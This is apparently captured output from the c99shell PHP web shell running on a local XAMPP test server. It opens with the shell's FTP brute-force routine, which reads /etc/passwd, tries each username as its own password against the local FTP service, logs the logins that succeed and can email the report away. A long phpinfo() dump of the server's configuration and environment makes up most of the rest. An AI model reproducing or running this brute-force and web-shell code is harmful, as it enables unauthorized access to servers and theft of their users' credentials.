";} else { function c99ftpbrutecheck($host,$port,$timeout,$login,$pass,$sh,$fqb_onlywithsh) { if ($fqb_onlywithsh) {$TRUE = (!in_array($sh,array("/bin/FALSE","/sbin/nologin")));} else {$TRUE = TRUE;} if ($TRUE) { $sock = @ftp_connect($host,$port,$timeout); if (@ftp_login($sock,$login,$pass)) { echo "<a href=\"ftp://".$login.":".$pass."@".$host."\" target=\"_blank\">Connected to ".$host." with login \"".$login."\" and password \"".$pass."\"</a>.
"; ob_flush(); return TRUE; } } } if (!empty($submit)) { if (!is_numeric($fqb_lenght)) {$fqb_lenght = $nixpwdperpage;} $fp = fopen("/etc/passwd","r"); if (!$fp) {echo "Can't get /etc/passwd for password-list.";} else { if ($fqb_logging) { if ($fqb_logfile) {$fqb_logfp = fopen($fqb_logfile,"w");} else {$fqb_logfp = FALSE;} $fqb_log = "FTP Quick Brute (called c99shell v. ".$shver.") started at ".date("d.m.Y H:i:s")."\r\n\r\n"; if ($fqb_logfile) {fwrite($fqb_logfp,$fqb_log,strlen($fqb_log));} } ob_flush(); $i = $success = 0; $ftpquick_st = getmicrotime(); while(!feof($fp)) { $str = explode(":",fgets($fp,2048)); if (c99ftpbrutecheck("localhost",21,1,$str[0],$str[0],$str[6],$fqb_onlywithsh)) { echo "Connected to ".getenv("SERVER_NAME")." with login \"".$str[0]."\" and password \"".$str[0]."\"
"; $fqb_log .= "Connected to ".getenv("SERVER_NAME")." with login \"".$str[0]."\" and password \"".$str[0]."\", at ".date("d.m.Y H:i:s")."\r\n"; if ($fqb_logfp) {fseek($fqb_logfp,0); fwrite($fqb_logfp,$fqb_log,strlen($fqb_log));} $success++; ob_flush(); } if ($i > $fqb_lenght) {break;} $i++; } if ($success == 0) {echo "No success. connections!"; $fqb_log .= "No success. connections!\r\n";} $ftpquick_t = round(getmicrotime()-$ftpquick_st,4); echo "<hr size=\"1\" noshade>Done!
Total time (secs.): ".$ftpquick_t."
Total connections: ".$i."
Success.: <font color=red>".$success."</font>

Connects per second: ".round($i/$ftpquick_t,2)."
"; $fqb_log .= "\r\n------------------------------------------\r\nDone!\r\nTotal time (secs.): ".$ftpquick_t."\r\nTotal connections: ".$i."\r\nSuccess.: ".$success."\r\nUnsuccess.:".($i-$success)."\r\nConnects per second: ".round($i/$ftpquick_t,2)."\r\n"; if ($fqb_logfp) {fseek($fqb_logfp,0); fwrite($fqb_logfp,$fqb_log,strlen($fqb_log));} if ($fqb_logemail) {@mail($fqb_logemail,"c99shell v. ".$shver." report",$fqb_log);} fclose($fqb_logfp); } } else { $logfile = $tmpdir_logs."ftpquickbrute_".date("d.m.Y_H_i_s").".log"; $logfile = str_replace("//",DIRECTORY_SEPARATOR,$logfile); echo "
<input type=hidden name=act value=\"ftpquickbrute\">
Read first: <input type=text name=\"fqb_lenght\" value=\"".$nixpwdperpage."\">

Users only with shell?&nbsp;<input type=\"checkbox\" name=\"fqb_onlywithsh\" value=\"1\">

Logging?&nbsp;<input type=\"checkbox\" name=\"fqb_logging\" value=\"1\" checked>

Logging to file?&nbsp;<input type=\"text\" name=\"fqb_logfile\" value=\"".$logfile."\" size=\"".(strlen($logfile)+2*(strlen($logfile)/10))."\">
Logging to e-mail?&nbsp;<input type=\"text\" name=\"fqb_logemail\" value=\"".$log_email."\" size=\"".(strlen($logemail)+2*(strlen($logemail)/10))."\">

<input type=submit name=submit value=\"Brute\">
"; } }}if ($act == "d"){ if (!is_dir($d)) {echo "
Permision denied!
";} else { echo "Directory information:<table border=0 cellspacing=1 cellpadding=2>"; if (!$win) { echo "Owner/Group "; $ow = posix_getpwuid(fileowner($d)); $gr = posix_getgrgid(filegroup($d)); $row[] = ($ow["name"]?$ow["name"]:fileowner($d))."/".($gr["name"]?$gr["name"]:filegroup($d)); } echo "Perms<a href=\"".$surl."act=chmod&d=".urlencode($d)."\">".view_perms_color($d)."</a>Create time ".date("d/m/Y H:i:s",filectime($d))."Access time ".date("d/m/Y H:i:s",fileatime($d))."MODIFY time ".date("d/m/Y H:i:s",filemtime($d))."
"; }}if ($act == "phpinfo") {@ob_clean(); phpinfo()
PHP logo

PHP Version 7.2.12

System Linux Beneri 4.15.0-135-generic #139-Ubuntu SMP Mon Jan 18 17:38:24 UTC 2021 x86_64
Build Date Nov 14 2018 22:25:43
Configure Command './configure' '--prefix=/opt/lampp' '--with-apxs2=/opt/lampp/bin/apxs' '--with-config-file-path=/opt/lampp/etc' '--with-mysql=mysqlnd' '--enable-inline-optimization' '--disable-debug' '--enable-bcmath' '--enable-calendar' '--enable-ctype' '--enable-ftp' '--enable-gd-native-ttf' '--enable-magic-quotes' '--enable-shmop' '--disable-sigchild' '--enable-sysvsem' '--enable-sysvshm' '--enable-wddx' '--with-gdbm=/opt/lampp' '--with-jpeg-dir=/opt/lampp' '--with-png-dir=/opt/lampp' '--with-freetype-dir=/opt/lampp' '--with-zlib=yes' '--with-zlib-dir=/opt/lampp' '--with-openssl=/opt/lampp' '--with-xsl=/opt/lampp' '--with-ldap=/opt/lampp' '--with-gd' '--with-imap=/bitnami/xamppunixinstaller72stack-linux-x64/src/imap-2007e' '--with-imap-ssl' '--with-gettext=/opt/lampp' '--with-mssql=shared,/opt/lampp' '--with-pdo-dblib=shared,/opt/lampp' '--with-sybase-ct=/opt/lampp' '--with-mysql-sock=/opt/lampp/var/mysql/mysql.sock' '--with-mcrypt=/opt/lampp' '--with-mhash=/opt/lampp' '--enable-sockets' '--enable-mbstring=all' '--with-curl=/opt/lampp' '--enable-mbregex' '--enable-zend-multibyte' '--enable-exif' '--with-bz2=/opt/lampp' '--with-sqlite=shared,/opt/lampp' '--with-sqlite3=/opt/lampp' '--with-libxml-dir=/opt/lampp' '--enable-soap' '--with-xmlrpc' '--enable-pcntl' '--with-mysqli=mysqlnd' '--with-pgsql=shared,/opt/lampp/' '--with-iconv=/opt/lampp' '--with-pdo-mysql=mysqlnd' '--with-pdo-pgsql=/opt/lampp/postgresql' '--with-pdo_sqlite=/opt/lampp' '--with-icu-dir=/opt/lampp' '--enable-fileinfo' '--enable-phar' '--enable-zip' '--enable-intl' '--disable-huge-code-pages'
Server API Apache 2.0 Handler
Virtual Directory Support disabled
Configuration File (php.ini) Path /opt/lampp/etc
Loaded Configuration File /opt/lampp/etc/php.ini
Scan this dir for additional .ini files (none)
Additional .ini files parsed (none)
PHP API 20170718
PHP Extension 20170718
Zend Extension 320170718
Zend Extension Build API320170718,NTS
PHP Extension Build API20170718,NTS
Debug Build no
Thread Safety disabled
Zend Signal Handling enabled
Zend Memory Manager enabled
Zend Multibyte Support provided by mbstring
IPv6 Support enabled
DTrace Support disabled
Registered PHP Streamshttps, ftps, compress.zlib, compress.bzip2, php, file, glob, data, http, ftp, phar, zip
Registered Stream Socket Transportstcp, udp, unix, udg, ssl, sslv3, tls, tlsv1.0, tlsv1.1, tlsv1.2
Registered Stream Filterszlib.*, bzip2.*, convert.iconv.*, string.rot13, string.toupper, string.tolower, string.strip_tags, convert.*, consumed, dechunk
Zend logo This program makes use of the Zend Scripting Language Engine:
Zend Engine v3.2.0, Copyright (c) 1998-2018 Zend Technologies



Apache Version Apache/2.4.37 (Unix) OpenSSL/1.0.2p PHP/7.2.12 mod_perl/2.0.8-dev Perl/v5.16.3
Apache API Version 20120211
Server Administrator you@example.com
Hostname:Port localhost:0
User/Group daemon(1)/1
Max Requests Per Child: 0 - Keep Alive: on - Max Per Connection: 100
Timeouts Connection: 300 - Keep-Alive: 5
Virtual Server No
Server Root /opt/lampp
Loaded Modules core mod_so http_core prefork mod_authn_file mod_authn_dbm mod_authn_anon mod_authn_dbd mod_authn_socache mod_authn_core mod_authz_host mod_authz_groupfile mod_authz_user mod_authz_dbm mod_authz_owner mod_authz_dbd mod_authz_core mod_authnz_ldap mod_access_compat mod_auth_basic mod_auth_form mod_auth_digest mod_allowmethods mod_file_cache mod_cache mod_cache_disk mod_socache_shmcb mod_socache_dbm mod_socache_memcache mod_dbd mod_bucketeer mod_dumpio mod_echo mod_case_filter mod_case_filter_in mod_buffer mod_ratelimit mod_reqtimeout mod_ext_filter mod_request mod_include mod_filter mod_substitute mod_sed mod_charset_lite mod_deflate mod_mime util_ldap mod_log_config mod_log_debug mod_logio mod_env mod_mime_magic mod_cern_meta mod_expires mod_headers mod_usertrack mod_unique_id mod_setenvif mod_version mod_remoteip mod_proxy mod_proxy_connect mod_proxy_ftp mod_proxy_http mod_proxy_fcgi mod_proxy_scgi mod_proxy_ajp mod_proxy_balancer mod_proxy_express mod_session mod_session_cookie mod_session_dbd mod_slotmem_shm mod_ssl mod_lbmethod_byrequests mod_lbmethod_bytraffic mod_lbmethod_bybusyness mod_lbmethod_heartbeat mod_unixd mod_dav mod_status mod_autoindex mod_info mod_suexec mod_cgi mod_cgid mod_dav_fs mod_vhost_alias mod_negotiation mod_dir mod_actions mod_speling mod_userdir mod_alias mod_rewrite mod_php7 mod_perl
DirectiveLocal ValueMaster Value

Apache Environment

HTTP_HOST localhost
HTTP_USER_AGENT Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:84.0) Gecko/20100101 Firefox/84.0
HTTP_ACCEPT text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
PATH /usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin
LD_LIBRARY_PATH /opt/lampp/lib:/opt/lampp/lib
SERVER_SOFTWARE Apache/2.4.37 (Unix) OpenSSL/1.0.2p PHP/7.2.12 mod_perl/2.0.8-dev Perl/v5.16.3
SERVER_NAME localhost
DOCUMENT_ROOT /opt/lampp/htdocs
CONTEXT_DOCUMENT_ROOT /opt/lampp/htdocs
SERVER_ADMIN you@example.com
SCRIPT_FILENAME /opt/lampp/htdocs/test.php
REQUEST_URI /test.php
SCRIPT_NAME /test.php

HTTP Headers Information

HTTP Request Headers
HTTP Request GET /test.php HTTP/1.1
Host localhost
User-Agent Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:84.0) Gecko/20100101 Firefox/84.0
Accept text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language en-US,en;q=0.5
Accept-Encoding gzip, deflate
Connection keep-alive
Upgrade-Insecure-Requests 1
Cache-Control max-age=0
HTTP Response Headers
X-Powered-By PHP/7.2.12


BCMath support enabled
DirectiveLocal ValueMaster Value


BZip2 Support Enabled
Stream Wrapper support compress.bzip2://
Stream Filter support bzip2.decompress, bzip2.compress
BZip2 Version 1.0.6, 6-Sept-2010


Calendar support enabled


PHP Version 7.2.12
DirectiveLocal ValueMaster Value
auto_append_fileno valueno value
auto_prepend_fileno valueno value
browscapno valueno value
disable_classesno valueno value
disable_functionsno valueno value
doc_rootno valueno value
docref_extno valueno value
docref_rootno valueno value
error_append_stringno valueno value
error_prepend_stringno valueno value
input_encodingno valueno value
internal_encodingno valueno value
mail.force_extra_parametersno valueno value
mail.logno valueno value
open_basedirno valueno value
output_encodingno valueno value
output_handlerno valueno value
sendmail_fromno valueno value
sendmail_path -t -i  -t -i 
sys_temp_dirno valueno value
unserialize_callback_funcno valueno value
user_dirno valueno value
zend.script_encodingno valueno value


ctype functions enabled


cURL support enabled
cURL Information 7.45.0
Age 3
AsynchDNS No
CharConv No
Debug No
GSS-Negotiate No
IPv6 Yes
krb4 No
Largefile Yes
libz Yes
Protocols dict, file, ftp, ftps, gopher, http, https, imap, imaps, ldap, ldaps, pop3, pop3s, rtsp, smb, smbs, smtp, smtps, telnet, tftp
Host x86_64-pc-linux-gnu
SSL Version OpenSSL/1.0.2p
ZLib Version 1.2.11


date/time support enabled
timelib version 2017.08
"Olson" Timezone Database Version 2018.6
Timezone Database internal
Default timezone Europe/Berlin
DirectiveLocal ValueMaster Value


DBA support enabled
Supported handlers gdbm cdb cdb_make inifile flatfile
DirectiveLocal ValueMaster Value


DOM/XML enabled
DOM/XML API Version 20031129
libxml Version 2.9.4
HTML Support enabled
XPath Support enabled
XPointer Support enabled
Schema Support enabled
RelaxNG Support enabled


EXIF Support enabled
EXIF Version 7.2.12
Supported EXIF Version 0220
Supported filetypes JPEG, TIFF
Multibyte decoding support using mbstring enabled
Extended EXIF tag formats Canon, Casio, Fujifilm, Nikon, Olympus, Samsung, Panasonic, DJI, Sony, Pentax, Minolta, Sigma, Foveon, Kyocera, Ricoh, AGFA, Epson
DirectiveLocal ValueMaster Value
exif.encode_jisno valueno value


fileinfo support enabled
version 1.0.5
libmagic 531


Input Validation and Filtering enabled
Revision $Id: 5a34caaa246b9df197f4b43af8ac66a07464fe4b $
DirectiveLocal ValueMaster Value
filter.default_flagsno valueno value


FTP support enabled
FTPS support enabled


GD Support enabled
GD Version bundled (2.1.0 compatible)
FreeType Support enabled
FreeType Linkage with freetype
FreeType Version 2.4.8
GIF Read Support enabled
GIF Create Support enabled
JPEG Support enabled
libJPEG Version 8
PNG Support enabled
libPNG Version 1.5.26
WBMP Support enabled
XBM Support enabled
DirectiveLocal ValueMaster Value


GetText Support enabled


hash support enabled
Hashing Engines md2 md4 md5 sha1 sha224 sha256 sha384 sha512/224 sha512/256 sha512 sha3-224 sha3-256 sha3-384 sha3-512 ripemd128 ripemd160 ripemd256 ripemd320 whirlpool tiger128,3 tiger160,3 tiger192,3 tiger128,4 tiger160,4 tiger192,4 snefru snefru256 gost gost-crypto adler32 crc32 crc32b fnv132 fnv1a32 fnv164 fnv1a64 joaat haval128,3 haval160,3 haval192,3 haval224,3 haval256,3 haval128,4 haval160,4 haval192,4 haval224,4 haval256,4 haval128,5 haval160,5 haval192,5 haval224,5 haval256,5
MHASH support Enabled
MHASH API Version Emulated Support


iconv support enabled
iconv implementation glibc
iconv library version 1.15
DirectiveLocal ValueMaster Value
iconv.input_encodingno valueno value
iconv.internal_encodingno valueno value
iconv.output_encodingno valueno value


IMAP c-Client Version 2007e
SSL Support enabled


Internationalization supportenabled
version 1.1.0
ICU version
ICU Data version 4.8.1
ICU TZData version 2011k
ICU Unicode version 6.0
DirectiveLocal ValueMaster Value
intl.default_localeno valueno value


json support enabled
json version 1.6.0


LDAP Support enabled
RCS Version $Id: 3839f871a91c293a52322c63329c68db23a0290a $
Total Links 0/unlimited
API Version 3001
Vendor Name OpenLDAP
Vendor Version 20421
DirectiveLocal ValueMaster Value


libXML support active
libXML Compiled Version 2.9.4
libXML Loaded Version 20904
libXML streams enabled


Multibyte Support enabled
Multibyte string engine libmbfl
HTTP input encoding translation disabled
libmbfl version 1.3.2
oniguruma version 6.3.0
mbstring extension makes use of "streamable kanji code filter and converter", which is distributed under the GNU Lesser General Public License version 2.1.
Multibyte (japanese) regex support enabled
Multibyte regex (oniguruma) backtrack check On
Multibyte regex (oniguruma) version 6.3.0
DirectiveLocal ValueMaster Value
mbstring.detect_orderno valueno value
mbstring.http_inputno valueno value
mbstring.http_outputno valueno value
mbstring.internal_encodingno valueno value
mbstring.substitute_characterno valueno value


MysqlI Supportenabled
Client API library version mysqlnd 5.0.12-dev - 20150407 - $Id: 38fea24f2847fa7519001be390c98ae0acafe387 $
Active Persistent Links 0
Inactive Persistent Links 0
Active Links 0
DirectiveLocal ValueMaster Value
mysqli.default_hostno valueno value
mysqli.default_pwno valueno value
mysqli.default_userno valueno value


Version mysqlnd 5.0.12-dev - 20150407 - $Id: 38fea24f2847fa7519001be390c98ae0acafe387 $
Compression supported
core SSL supported
extended SSL supported
Command buffer size 4096
Read buffer size 32768
Read timeout 86400
Collecting statistics Yes
Collecting memory statistics Yes
Tracing n/a
Loaded plugins mysqlnd,debug_trace,auth_plugin_mysql_native_password,auth_plugin_mysql_clear_password,auth_plugin_sha256_password
API Extensions mysqli,pdo_mysql
mysqlnd statistics
bytes_sent 0
bytes_received 0
packets_sent 0
packets_received 0
protocol_overhead_in 0
protocol_overhead_out 0
bytes_received_ok_packet 0
bytes_received_eof_packet 0
bytes_received_rset_header_packet 0
bytes_received_rset_field_meta_packet 0
bytes_received_rset_row_packet 0
bytes_received_prepare_response_packet 0
bytes_received_change_user_packet 0
packets_sent_command 0
packets_received_ok 0
packets_received_eof 0
packets_received_rset_header 0
packets_received_rset_field_meta 0
packets_received_rset_row 0
packets_received_prepare_response 0
packets_received_change_user 0
result_set_queries 0
non_result_set_queries 0
no_index_used 0
bad_index_used 0
slow_queries 0
buffered_sets 0
unbuffered_sets 0
ps_buffered_sets 0
ps_unbuffered_sets 0
flushed_normal_sets 0
flushed_ps_sets 0
ps_prepared_never_executed 0
ps_prepared_once_executed 0
rows_fetched_from_server_normal 0
rows_fetched_from_server_ps 0
rows_buffered_from_client_normal 0
rows_buffered_from_client_ps 0
rows_fetched_from_client_normal_buffered 0
rows_fetched_from_client_normal_unbuffered 0
rows_fetched_from_client_ps_buffered 0
rows_fetched_from_client_ps_unbuffered 0
rows_fetched_from_client_ps_cursor 0
rows_affected_normal 0
rows_affected_ps 0
rows_skipped_normal 0
rows_skipped_ps 0
copy_on_write_saved 0
copy_on_write_performed 0
command_buffer_too_small 0
connect_success 0
connect_failure 0
connection_reused 0
reconnect 0
pconnect_success 0
active_connections 0
active_persistent_connections 0
explicit_close 0
implicit_close 0
disconnect_close 0
in_middle_of_command_close 0
explicit_free_result 0
implicit_free_result 0
explicit_stmt_close 0
implicit_stmt_close 0
mem_emalloc_count 0
mem_emalloc_amount 0
mem_ecalloc_count 0
mem_ecalloc_amount 0
mem_erealloc_count 0
mem_erealloc_amount 0
mem_efree_count 0
mem_efree_amount 0
mem_malloc_count 0
mem_malloc_amount 0
mem_calloc_count 0
mem_calloc_amount 0
mem_realloc_count 0
mem_realloc_amount 0
mem_free_count 0
mem_free_amount 0
mem_estrndup_count 0
mem_strndup_count 0
mem_estrdup_count 0
mem_strdup_count 0
mem_edupl_count 0
mem_dupl_count 0
proto_text_fetched_null 0
proto_text_fetched_bit 0
proto_text_fetched_tinyint 0
proto_text_fetched_short 0
proto_text_fetched_int24 0
proto_text_fetched_int 0
proto_text_fetched_bigint 0
proto_text_fetched_decimal 0
proto_text_fetched_float 0
proto_text_fetched_double 0
proto_text_fetched_date 0
proto_text_fetched_year 0
proto_text_fetched_time 0
proto_text_fetched_datetime 0
proto_text_fetched_timestamp 0
proto_text_fetched_string 0
proto_text_fetched_blob 0
proto_text_fetched_enum 0
proto_text_fetched_set 0
proto_text_fetched_geometry 0
proto_text_fetched_other 0
proto_binary_fetched_null 0
proto_binary_fetched_bit 0
proto_binary_fetched_tinyint 0
proto_binary_fetched_short 0
proto_binary_fetched_int24 0
proto_binary_fetched_int 0
proto_binary_fetched_bigint 0
proto_binary_fetched_decimal 0
proto_binary_fetched_float 0
proto_binary_fetched_double 0
proto_binary_fetched_date 0
proto_binary_fetched_year 0
proto_binary_fetched_time 0
proto_binary_fetched_datetime 0
proto_binary_fetched_timestamp 0
proto_binary_fetched_string 0
proto_binary_fetched_json 0
proto_binary_fetched_blob 0
proto_binary_fetched_enum 0
proto_binary_fetched_set 0
proto_binary_fetched_geometry 0
proto_binary_fetched_other 0
init_command_executed_count 0
init_command_failed_count 0
com_quit 0
com_init_db 0
com_query 0
com_field_list 0
com_create_db 0
com_drop_db 0
com_refresh 0
com_shutdown 0
com_statistics 0
com_process_info 0
com_connect 0
com_process_kill 0
com_debug 0
com_ping 0
com_time 0
com_delayed_insert 0
com_change_user 0
com_binlog_dump 0
com_table_dump 0
com_connect_out 0
com_register_slave 0
com_stmt_prepare 0
com_stmt_execute 0
com_stmt_send_long_data 0
com_stmt_close 0
com_stmt_reset 0
com_stmt_set_option 0
com_stmt_fetch 0
com_deamon 0
bytes_received_real_data_normal 0
bytes_received_real_data_ps 0


OpenSSL support enabled
OpenSSL Library Version OpenSSL 1.0.2p 14 Aug 2018
OpenSSL Header Version OpenSSL 1.0.2p 14 Aug 2018
Openssl default config /opt/lampp/share/openssl/openssl.cnf
DirectiveLocal ValueMaster Value
openssl.capathno valueno value


PCRE (Perl Compatible Regular Expressions) Support enabled
PCRE Library Version 8.41 2017-07-05
PCRE JIT Support enabled
DirectiveLocal ValueMaster Value


PDO supportenabled
PDO drivers mysql, pgsql, sqlite


PDO Driver for MySQLenabled
Client API version mysqlnd 5.0.12-dev - 20150407 - $Id: 38fea24f2847fa7519001be390c98ae0acafe387 $
DirectiveLocal ValueMaster Value


PDO Driver for PostgreSQLenabled
PostgreSQL(libpq) Version 9.2.4
Module version 7.2.12
Revision $Id: 9c5f356c77143981d2e905e276e439501fe0f419 $


PDO Driver for SQLite 3.xenabled
SQLite Library 3.7.17


Phar: PHP Archive supportenabled
Phar EXT version 2.0.2
Phar API version 1.1.1
SVN revision $Id: 11c9d270a69dbd9589cbea10a0ad9731a286a147 $
Phar-based phar archives enabled
Tar-based phar archives enabled
ZIP-based phar archives enabled
gzip compression enabled
bzip2 compression enabled
OpenSSL support enabled
Phar based on pear/PHP_Archive, original concept by Davey Shafik.
Phar fully realized by Gregory Beaver and Marcus Boerger.
Portions of tar implementation Copyright (c) 2003-2009 Tim Kientzle.
DirectiveLocal ValueMaster Value
phar.cache_listno valueno value


Revision $Id: 0a764bab332255746424a1e6cfbaaeebab998e4c $


Version $Id: f1096fbe817b0413895286a603375570e78fb553 $


Session Support enabled
Registered save handlers files user
Registered serializer handlers php_serialize php php_binary wddx
DirectiveLocal ValueMaster Value
session.cookie_domainno valueno value
session.cookie_httponlyno valueno value
session.referer_checkno valueno value


shmop support enabled


Simplexml supportenabled
Revision $Id: 341daed0ee94ea8f728bfd0ba4626e6ed365c0d1 $
Schema support enabled


Soap Client enabled
Soap Server enabled
DirectiveLocal ValueMaster Value


Sockets Support enabled


SPL supportenabled
Interfaces OuterIterator, RecursiveIterator, SeekableIterator, SplObserver, SplSubject
Classes AppendIterator, ArrayIterator, ArrayObject, BadFunctionCallException, BadMethodCallException, CachingIterator, CallbackFilterIterator, DirectoryIterator, DomainException, EmptyIterator, FilesystemIterator, FilterIterator, GlobIterator, InfiniteIterator, InvalidArgumentException, IteratorIterator, LengthException, LimitIterator, LogicException, MultipleIterator, NoRewindIterator, OutOfBoundsException, OutOfRangeException, OverflowException, ParentIterator, RangeException, RecursiveArrayIterator, RecursiveCachingIterator, RecursiveCallbackFilterIterator, RecursiveDirectoryIterator, RecursiveFilterIterator, RecursiveIteratorIterator, RecursiveRegexIterator, RecursiveTreeIterator, RegexIterator, RuntimeException, SplDoublyLinkedList, SplFileInfo, SplFileObject, SplFixedArray, SplHeap, SplMinHeap, SplMaxHeap, SplObjectStorage, SplPriorityQueue, SplQueue, SplStack, SplTempFileObject, UnderflowException, UnexpectedValueException


SQLite3 supportenabled
SQLite3 module version 7.2.12
SQLite Library 3.7.17
DirectiveLocal ValueMaster Value
sqlite3.extension_dirno valueno value


Dynamic Library Support enabled
Path to sendmail -t -i
DirectiveLocal ValueMaster Value
assert.callbackno valueno value
fromno valueno value
session.trans_sid_hostsno valueno value
url_rewriter.hostsno valueno value
user_agentno valueno value


Version 7.2.12


Version 7.2.12


Tokenizer Support enabled


WDDX Supportenabled
WDDX Session Serializer enabled


XML Support active
XML Namespace Support active
libxml2 Version 2.9.4


XMLReader enabled


core library version xmlrpc-epi v. 0.51
php extension version 7.2.12
author Dan Libby
homepage http://xmlrpc-epi.sourceforge.net
open sourced by Epinions.com


XMLWriter enabled


XSL enabled
libxslt Version 1.1.29
libxslt compiled against libxml Version 2.9.4
EXSLT enabled
libexslt Version 1.1.29


Zip enabled
Zip version 1.15.4
Libzip version 1.1.2


ZLib Supportenabled
Stream Wrapper compress.zlib://
Stream Filter zlib.inflate, zlib.deflate
Compiled Version 1.2.11
Linked Version 1.2.11
DirectiveLocal ValueMaster Value
zlib.output_handlerno valueno value

Additional Modules

Module Name


MAIL /var/mail/root
USER root
LD_LIBRARY_PATH /opt/lampp/lib:/opt/lampp/lib
HOME /home/beneri
de false
GETTEXT /opt/lampp/bin/gettext
COLORTERM truecolor
_ /opt/lampp/bin/apachectl
TERM xterm-256color
PATH /usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin
LS_COLORS rs=0:di=01;34:ln=01;36:mh=00:pi=40;33:so=01;35:do=01;35:bd=40;33;01:cd=40;33;01:or=40;31;01:mi=00:su=37;41:sg=30;43:ca=30;41:tw=30;42:ow=34;42:st=37;44:ex=01;32:*.tar=01;31:*.tgz=01;31:*.arc=01;31:*.arj=01;31:*.taz=01;31:*.lha=01;31:*.lz4=01;31:*.lzh=01;31:*.lzma=01;31:*.tlz=01;31:*.txz=01;31:*.tzo=01;31:*.t7z=01;31:*.zip=01;31:*.z=01;31:*.Z=01;31:*.dz=01;31:*.gz=01;31:*.lrz=01;31:*.lz=01;31:*.lzo=01;31:*.xz=01;31:*.zst=01;31:*.tzst=01;31:*.bz2=01;31:*.bz=01;31:*.tbz=01;31:*.tbz2=01;31:*.tz=01;31:*.deb=01;31:*.rpm=01;31:*.jar=01;31:*.war=01;31:*.ear=01;31:*.sar=01;31:*.rar=01;31:*.alz=01;31:*.ace=01;31:*.zoo=01;31:*.cpio=01;31:*.7z=01;31:*.rz=01;31:*.cab=01;31:*.wim=01;31:*.swm=01;31:*.dwm=01;31:*.esd=01;31:*.jpg=01;35:*.jpeg=01;35:*.mjpg=01;35:*.mjpeg=01;35:*.gif=01;35:*.bmp=01;35:*.pbm=01;35:*.pgm=01;35:*.ppm=01;35:*.tga=01;35:*.xbm=01;35:*.xpm=01;35:*.tif=01;35:*.tiff=01;35:*.png=01;35:*.svg=01;35:*.svgz=01;35:*.mng=01;35:*.pcx=01;35:*.mov=01;35:*.mpg=01;35:*.mpeg=01;35:*.m2v=01;35:*.mkv=01;35:*.webm=01;35:*.ogm=01;35:*.mp4=01;35:*.m4v=01;35:*.mp4v=01;35:*.vob=01;35:*.qt=01;35:*.nuv=01;35:*.wmv=01;35:*.asf=01;35:*.rm=01;35:*.rmvb=01;35:*.flc=01;35:*.avi=01;35:*.fli=01;35:*.flv=01;35:*.gl=01;35:*.dl=01;35:*.xcf=01;35:*.xwd=01;35:*.yuv=01;35:*.cgm=01;35:*.emf=01;35:*.ogv=01;35:*.ogx=01;35:*.aac=00;36:*.au=00;36:*.flac=00;36:*.m4a=00;36:*.mid=00;36:*.midi=00;36:*.mka=00;36:*.mp3=00;36:*.mpc=00;36:*.ogg=00;36:*.ra=00;36:*.wav=00;36:*.oga=00;36:*.opus=00;36:*.spx=00;36:*.xspf=00;36:
XAUTHORITY /home/beneri/.Xauthority
SUDO_COMMAND /opt/lampp/lampp start
SHELL /bin/bash
XAMPP_ROOT /opt/lampp
PWD /home/beneri

PHP Variables

$_SERVER['HTTP_USER_AGENT']Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:84.0) Gecko/20100101 Firefox/84.0
$_SERVER['SERVER_SOFTWARE']Apache/2.4.37 (Unix) OpenSSL/1.0.2p PHP/7.2.12 mod_perl/2.0.8-dev Perl/v5.16.3

PHP Credits

PHP Group
Thies C. Arntzen, Stig Bakken, Shane Caraveo, Andi Gutmans, Rasmus Lerdorf, Sam Ruby, Sascha Schumann, Zeev Suraski, Jim Winstead, Andrei Zmievski
Language Design & Concept
Andi Gutmans, Rasmus Lerdorf, Zeev Suraski, Marcus Boerger
PHP Authors
Zend Scripting Language Engine Andi Gutmans, Zeev Suraski, Stanislav Malyshev, Marcus Boerger, Dmitry Stogov, Xinchen Hui, Nikita Popov
Extension Module API Andi Gutmans, Zeev Suraski, Andrei Zmievski
UNIX Build and Modularization Stig Bakken, Sascha Schumann, Jani Taskinen
Windows Support Shane Caraveo, Zeev Suraski, Wez Furlong, Pierre-Alain Joye, Anatol Belski, Kalle Sommer Nielsen
Server API (SAPI) Abstraction Layer Andi Gutmans, Shane Caraveo, Zeev Suraski
Streams Abstraction Layer Wez Furlong, Sara Golemon
PHP Data Objects Layer Wez Furlong, Marcus Boerger, Sterling Hughes, George Schlossnagle, Ilia Alshanetsky
Output Handler Zeev Suraski, Thies C. Arntzen, Marcus Boerger, Michael Wallner
Consistent 64 bit support Anthony Ferrara, Anatol Belski
SAPI Modules
Apache 2.0 Handler Ian Holsman, Justin Erenkrantz (based on Apache 2.0 Filter code)
CGI / FastCGI Rasmus Lerdorf, Stig Bakken, Shane Caraveo, Dmitry Stogov
CLI Edin Kadribasic, Marcus Boerger, Johannes Schlueter, Moriyoshi Koizumi, Xinchen Hui
Embed Edin Kadribasic
FastCGI Process Manager Andrei Nigmatulin, dreamcat4, Antony Dovgal, Jerome Loyet
litespeed George Wang
phpdbg Felipe Pena, Joe Watkins, Bob Weinand
Module Authors
BC Math Andi Gutmans
Bzip2 Sterling Hughes
Calendar Shane Caraveo, Colin Viebrock, Hartmut Holzgraefe, Wez Furlong
COM and .Net Wez Furlong
ctype Hartmut Holzgraefe
cURL Sterling Hughes
Date/Time Support Derick Rethans
DB-LIB (MS SQL, Sybase) Wez Furlong, Frank M. Kromann, Adam Baratz
DBA Sascha Schumann, Marcus Boerger
DOM Christian Stocker, Rob Richards, Marcus Boerger
enchant Pierre-Alain Joye, Ilia Alshanetsky
EXIF Rasmus Lerdorf, Marcus Boerger
fileinfo Ilia Alshanetsky, Pierre Alain Joye, Scott MacVicar, Derick Rethans, Anatol Belski
Firebird driver for PDO Ard Biesheuvel
FTP Stefan Esser, Andrew Skalski
GD imaging Rasmus Lerdorf, Stig Bakken, Jim Winstead, Jouni Ahto, Ilia Alshanetsky, Pierre-Alain Joye, Marcus Boerger
GetText Alex Plotnick
GNU GMP support Stanislav Malyshev
Iconv Rui Hirokawa, Stig Bakken, Moriyoshi Koizumi
IMAP Rex Logan, Mark Musone, Brian Wang, Kaj-Michael Lang, Antoni Pamies Olive, Rasmus Lerdorf, Andrew Skalski, Chuck Hagenbuch, Daniel R Kalowsky
